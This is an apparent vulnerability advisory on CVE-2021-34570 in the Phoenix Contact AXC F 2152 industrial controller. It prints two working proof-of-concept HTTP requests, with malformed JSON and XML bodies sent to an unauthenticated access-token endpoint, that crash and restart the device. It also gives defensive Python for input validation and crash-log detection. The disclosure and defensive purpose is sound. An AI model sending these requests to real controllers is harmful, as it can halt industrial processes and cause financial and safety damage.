Author: Oliver Carrigan – OT Security Consultant
Introduction
The Phoenix Contact AXC F 2152 is a Linux-based industrial controller used in harsh industrial environments to control industrial processes such as manufacturing lines and building management systems. The controller was found to be affected by a restart vulnerability (CVE-2021-34570) that allows an unauthenticated attacker with network access to the device to create a denial-of-service condition, impacting the availability of the device.
Vulnerability
The controller runs a Linux-based operating system, on top of which sits a REST-based API web service used to interact with the web-based HMI. The HMI provides a graphical representation of the process currently under control. To view the web-based HMI, the controller implements a 3-stage authentication process using OAuth to authenticate the user and ensure they are authorised to access the HMI. An attacker can abuse the /_pxc_api/v1.2/auth/access-token endpoint used in this authentication process to force the controller to restart, because a malformed request body triggers a segmentation fault in the API service on the controller. This is achieved by sending a malformed JSON request to the endpoint.
A legitimate authentication request to the endpoint carries the following headers and JSON body:
Host: <IP>
Connection: close
Content-Length: 129
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"code":"be3fcb3c2bdeff54","grant_type":"authorization_code","username":"*********","password":"********","state":"30a847a460c6a1f6"}
The following POCs were used to launch the attack:
POST /_pxc_api/v1.2/auth/access-token
Host: <IP>
Connection: close
Content-Length: 3
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{ A }
POST /_pxc_api/v1.2/auth/access-token
Host: <IP>
Connection: close
Content-Length: 234
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: text/plain; charset=UTF-8
Accept: */*
Origin: https://<IP>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://<IP>/ehmi/hmiapp.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<root>
<password>********</password>
<code>db0d04e21dbc0ede</code>
<grant_type/>
<state>4cf70d2058cb2b62</state>
<username>*********</username>
</root>
Both POCs cause the controller to return the following response, after which the controller stops responding to ICMP requests.
HTTP/1.1 502 Bad Gateway
Server: nginx
Date:
Content-Type: text/html
Content-Length: 552
Connection: close

<html>
<head><title>502 Bad Gateway</title></head>
<body>
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
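The root cause described above is an API service that crashes on input it did not expect, instead of rejecting it at the boundary. The following added example (written for this page, not Phoenix Contact's code) shows the kind of strict body validation a front-door handler for the access-token endpoint should perform: the body is size-capped, decoded, parsed as JSON, and checked against the exact field set seen in the legitimate request on this page before anything downstream touches it. Both PoC bodies from the page are answered with a 400 rather than reaching the backend. The field names come from the page; the 16-hex-character format for code and state, the allowed grant type, the size cap and the handler itself are assumptions made for the example.

```python
from __future__ import annotations

import json
import re

# Field names come from the legitimate request shown on this page; the format
# constraints on "code" and "state" (16 lowercase hex characters), the allowed
# grant types and the size cap are assumptions made for this example.
REQUIRED_FIELDS = frozenset({"code", "grant_type", "username", "password", "state"})
HEX_TOKEN = re.compile(r"[0-9a-f]{16}")
ALLOWED_GRANT_TYPES = frozenset({"authorization_code"})
MAX_BODY_BYTES = 4096


class BadRequest(ValueError):
    """Any body that must be answered with HTTP 400 instead of reaching the backend."""


def validate_access_token_body(raw: bytes) -> dict[str, str]:
    """Strictly parse and shape-check the request body; raise BadRequest on any deviation."""
    if len(raw) > MAX_BODY_BYTES:
        raise BadRequest("body too large")
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError as exc:
        raise BadRequest("body is not UTF-8") from exc
    try:
        body = json.loads(text)
    except json.JSONDecodeError as exc:
        # Covers both PoC bodies on this page: "{ A }" and the XML document.
        raise BadRequest(f"body is not valid JSON: {exc.msg}") from exc
    if not isinstance(body, dict):
        raise BadRequest("JSON body must be an object")
    keys = set(body)
    missing = REQUIRED_FIELDS - keys
    extra = keys - REQUIRED_FIELDS
    if missing or extra:
        raise BadRequest(f"unexpected fields: missing={sorted(missing)} extra={sorted(extra)}")
    for key, value in body.items():
        if not isinstance(value, str):
            raise BadRequest(f"field {key!r} must be a string")
    if body["grant_type"] not in ALLOWED_GRANT_TYPES:
        raise BadRequest("unsupported grant_type")
    for key in ("code", "state"):
        if not HEX_TOKEN.fullmatch(body[key]):
            raise BadRequest(f"field {key!r} has an unexpected format")
    return body


def handle_access_token_request(raw: bytes) -> tuple[int, str]:
    """Front-door handler: validation failures become a 400 response, never a crash."""
    try:
        body = validate_access_token_body(raw)
    except BadRequest as exc:
        return 400, f"invalid request: {exc}"
    # Hypothetical stand-in for the real token issuance; only validated input gets here.
    return 200, f"accepted {body['grant_type']} grant for user {body['username']!r}"


# Constructed sample bodies: the first is the legitimate body from the page (credentials
# redacted as on the page), the other two are the PoC bodies from the page.
SAMPLE_BODIES = {
    "legitimate": b'{"code":"be3fcb3c2bdeff54","grant_type":"authorization_code",'
                  b'"username":"*********","password":"********","state":"30a847a460c6a1f6"}',
    "poc_malformed_json": b"{ A }",
    "poc_xml": (b'<?xml version="1.0" encoding="UTF-8" standalone="no"?>'
                b"<root><password>********</password><code>db0d04e21dbc0ede</code>"
                b"<grant_type/><state>4cf70d2058cb2b62</state><username>*********</username></root>"),
}


def run_samples() -> dict[str, int]:
    """Status code the handler returns for each constructed sample body."""
    return {name: handle_access_token_request(raw)[0] for name, raw in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for name, raw in SAMPLE_BODIES.items():
        status, message = handle_access_token_request(raw)
        print(f"{name:20s} -> {status} {message}")
```

The point of the allow-list on field names and the fixed grant type is that anything the real handler was not written for (a bare word where an object was expected, an XML document, a non-string value, an extra key) is rejected before the parser that actually crashed ever sees it; a 400 is a recoverable condition, a segmentation fault is a reboot.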
Proof of Concept Video
Likelihood
Whilst the /_pxc_api/v1.2/auth/access-token endpoint is accessible without any authentication, an attacker would first need access to the closed network the controller sits on, which is typically protected by a suitable firewall, in order to perform this attack.
Impact
The AXC F 2152 controller is predominantly found within manufacturing facilities, and an attacker who successfully exploits this vulnerability would be able to stop the manufacturing process, resulting in financial loss and reputational harm. An attacker could script this exploit in order to cause a lasting impact on production output.
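As a defender-side counterpart to the repeated, scripted attack described above, the following added example (written for this page, not part of the original advisory or the vendor's tooling) runs over the access log of the nginx front end that returned the 502 shown earlier. It flags every request to the access-token endpoint that nginx answered with 502, meaning the API process behind it was gone, and then reports any source address that caused this repeatedly within a time window, which separates a one-off from someone knocking the controller over again and again. It assumes nginx writes the standard "combined" log format; the log lines themselves are constructed for the example (the 552 byte count matches the Content-Length of the page's 502 response).

```python
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

AUTH_ENDPOINT = "/_pxc_api/v1.2/auth/access-token"

# nginx "combined" log format. Assumption: the controller's nginx front end writes it;
# the page only shows that nginx sits in front of the API and answers 502 when it dies.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse_line(line: str) -> dict | None:
    """Parse one combined-format line; return None for anything that does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_auth_endpoint_failures(lines) -> list[dict]:
    """Requests to the auth endpoint that the proxy answered with 502, i.e. the API
    process behind nginx was gone, the symptom this advisory describes."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] == AUTH_ENDPOINT and rec["status"] == 502:
            hits.append(rec)
    return hits


def repeated_sources(hits, window=timedelta(minutes=30), threshold=3) -> dict[str, int]:
    """Sources with at least `threshold` such failures inside any `window`, i.e. a
    source that keeps taking the controller down rather than a single incident.
    Returns {source: count within the first window that reaches the threshold}."""
    by_src = defaultdict(list)
    for h in hits:
        by_src[h["src"]].append(h["time"])
    flagged = {}
    for src, times in by_src.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= threshold:
                flagged[src] = j - i
                break
    return flagged


# Constructed sample log: one legitimate login, three crashes caused by 192.0.2.77
# over fifteen minutes, one isolated crash caused by 192.0.2.23, and a junk line.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2021:14:03:22 +0000] "POST /_pxc_api/v1.2/auth/access-token HTTP/1.1" 200 318 "https://192.0.2.1/ehmi/hmiapp.html" "Mozilla/5.0"',
    '192.0.2.77 - - [10/Mar/2021:14:05:01 +0000] "POST /_pxc_api/v1.2/auth/access-token HTTP/1.1" 502 552 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [10/Mar/2021:14:12:30 +0000] "POST /_pxc_api/v1.2/auth/access-token HTTP/1.1" 502 552 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [10/Mar/2021:14:20:10 +0000] "POST /_pxc_api/v1.2/auth/access-token HTTP/1.1" 502 552 "-" "Mozilla/5.0"',
    '192.0.2.23 - - [10/Mar/2021:15:00:00 +0000] "POST /_pxc_api/v1.2/auth/access-token HTTP/1.1" 502 552 "-" "Mozilla/5.0"',
    "not a log line",
]


if __name__ == "__main__":
    failures = find_auth_endpoint_failures(SAMPLE_LOG)
    for rec in failures:
        print(f"{rec['time'].isoformat()} 502 on {AUTH_ENDPOINT} from {rec['src']}")
    for src, count in repeated_sources(failures).items():
        print(f"ALERT: {src} caused {count} API crashes within one window")
```

Because the whole controller restarts after the first malformed request, only the request that triggered each crash is logged; anything sent while the device is rebooting never reaches nginx. The per-source window therefore counts crash events, not request volume, which is why a low threshold is appropriate here. Forwarding the nginx log to a central collector matters for the same reason: a device that is repeatedly rebooted is a poor place to keep the only copy of the evidence.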